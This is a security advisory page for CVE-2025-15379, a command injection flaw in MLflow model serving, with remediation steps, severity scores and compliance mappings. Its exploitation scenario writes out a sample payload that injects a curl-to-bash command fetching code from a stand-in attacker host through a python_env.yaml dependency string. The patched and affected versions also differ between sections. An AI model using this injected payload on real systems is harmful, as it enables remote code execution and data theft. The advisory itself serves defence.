CVE-2025-15379: MLflow RCE — CRITICAL

Q: Is CVE-2025-15379 actively exploited?

No confirmed active exploitation of CVE-2025-15379 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2025-15379?

1. Patch MLflow to version 3.8.2 immediately — primary and definitive remediation. 2. Until patched: avoid env_manager=LOCAL for models from untrusted sources; evaluate env_manager=CONDA or VIRTUALENV as interim alternatives. 3. Implement model provenance validation — only deploy cryptographically signed models from approved internal registries. 4. Restrict write access to model registries to verified CI/CD service accounts with MFA. 5. Audit all python_env.yaml files in deployed model artifacts for anomalous shell metacharacters or unexpected dependency strings. 6. Detection: alert on unexpected subprocess spawning or outbound network connections originating from MLflow serving processes.

Q: What systems are affected by CVE-2025-15379?

This vulnerability affects the following AI/ML architecture patterns: model serving, ML deployment pipelines, MLOps platforms, model registries, training pipelines.

Q: What is the CVSS score for CVE-2025-15379?

CVE-2025-15379 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 0.28%.

CISO Take

MLflow deployments loading models with env_manager=LOCAL are vulnerable to arbitrary command execution through crafted python_env.yaml files embedded in model artifacts. Patch to 3.8.2 immediately and enforce model provenance controls. Any pipeline that automatically deploys models from shared or external registries should be treated as actively at risk until patched.

What is the risk?

High risk in MLOps environments with shared model registries or automated deployment pipelines. Exploitation requires only model upload access — trivial for insider threats and feasible for external attackers who compromise model sources or CI/CD pipelines. The attack yields full RCE with MLflow process privileges, which in cloud ML platforms typically includes IAM roles, storage access, and lateral movement capability into connected ML infrastructure. The absence of CVSS data reflects disclosure timing, not reduced severity.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
MLflow	pip	< 3.8.1	`3.8.1`
26.3K OpenSSF 5.6 651 dependents Pushed 4d ago 29% patched ~52d to patch Full package profile →

Do you use MLflow? You're affected.

How severe is it?

CVSS 3.1

10.0 / 10

EPSS

0.3%

chance of exploitation in 30 days

Higher than 52% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

What is the attack surface?

AV Network

AC Low

PR None

UI None

S Changed

C High

I High

A High

What should I do?

6 steps

Patch MLflow to version 3.8.2 immediately — primary and definitive remediation.
Until patched: avoid env_manager=LOCAL for models from untrusted sources; evaluate env_manager=CONDA or VIRTUALENV as interim alternatives.
Implement model provenance validation — only deploy cryptographically signed models from approved internal registries.
Restrict write access to model registries to verified CI/CD service accounts with MFA.
Audit all python_env.yaml files in deployed model artifacts for anomalous shell metacharacters or unexpected dependency strings.
Detection: alert on unexpected subprocess spawning or outbound network connections originating from MLflow serving processes.

What does CISA's SSVC say?

Decision Attend

Exploitation poc

Automatable Yes

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Supply Chain Framework AML.T0010.001 - AI Software AML.T0010.003 - Model AML.T0011.000 - Unsafe AI Artifacts AML.T0050 - Command and Scripting Interpreter

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.2 - AI system security

NIST AI RMF

GOVERN 6.1 - AI Supply Chain Risk Management

OWASP LLM Top 10

LLM05 - Supply Chain Vulnerabilities

How many AI incidents are linked? (1)

Malicious Nx npm Packages Reportedly Weaponize AI Coding Agents for Data Exfiltration

Aug 2025 Malicious actors compromising Nx’s CI/CD pipeline and publishing tainted npm packages medium confidence

Both involve supply chain attacks where a malicious artifact executes arbitrary code during automated processing — CVE-2025-15379 via a poisoned MLflow model artifact triggering command injection at deployment, and AIID #1210 via malicious npm packages executing code through postinstall scripts after CI compromise. The attack class (supply chain → code execution during artifact ingestion) and targeting of AI/ML tooling pipelines are directly analogous.

AIID #1210

Source: AI Incident Database (AIID)

Frequently Asked Questions

What is CVE-2025-15379?

MLflow deployments loading models with env_manager=LOCAL are vulnerable to arbitrary command execution through crafted python_env.yaml files embedded in model artifacts. Patch to 3.8.2 immediately and enforce model provenance controls. Any pipeline that automatically deploys models from shared or external registries should be treated as actively at risk until patched.

Is CVE-2025-15379 actively exploited?

No confirmed active exploitation of CVE-2025-15379 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-15379?

1. Patch MLflow to version 3.8.2 immediately — primary and definitive remediation. 2. Until patched: avoid env_manager=LOCAL for models from untrusted sources; evaluate env_manager=CONDA or VIRTUALENV as interim alternatives. 3. Implement model provenance validation — only deploy cryptographically signed models from approved internal registries. 4. Restrict write access to model registries to verified CI/CD service accounts with MFA. 5. Audit all python_env.yaml files in deployed model artifacts for anomalous shell metacharacters or unexpected dependency strings. 6. Detection: alert on unexpected subprocess spawning or outbound network connections originating from MLflow serving processes.

What systems are affected by CVE-2025-15379?

This vulnerability affects the following AI/ML architecture patterns: model serving, ML deployment pipelines, MLOps platforms, model registries, training pipelines.

What is the CVSS score for CVE-2025-15379?

CVE-2025-15379 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 0.28%.

What is the AI security impact?

Affected AI Architectures

model servingML deployment pipelinesMLOps platformsmodel registriestraining pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0010.003 Model

AML.T0011.000 Unsafe AI Artifacts

AML.T0050 Command and Scripting Interpreter

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.6.2.2

NIST AI RMF: GOVERN 6.1

OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_install_model_dependencies_to_env()` function. When deploying a model with `env_manager=LOCAL`, MLflow reads dependency specifications from the model artifact's `python_env.yaml` file and directly interpolates them into a shell command without sanitization. This allows an attacker to supply a malicious model artifact and achieve arbitrary command execution on systems that deploy the model. The vulnerability affects versions 3.8.0 and is fixed in version 3.8.2.

Exploitation Scenario

An attacker with model registry write access — via a compromised developer account, insider threat, or upstream supply chain compromise — uploads a malicious model artifact containing a crafted python_env.yaml with an injected shell payload embedded in a dependency specification (e.g., 'torch==2.0.0; curl -s attacker.com/implant.sh | bash #'). When an automated MLOps pipeline or engineer deploys the model using env_manager=LOCAL, MLflow reads the yaml and interpolates the dependency string directly into a shell command without sanitization. The attacker's payload executes with the privileges of the MLflow process — typically a service account with broad cloud permissions — enabling full host takeover, exfiltration of model weights and training data, and persistence in the ML serving infrastructure.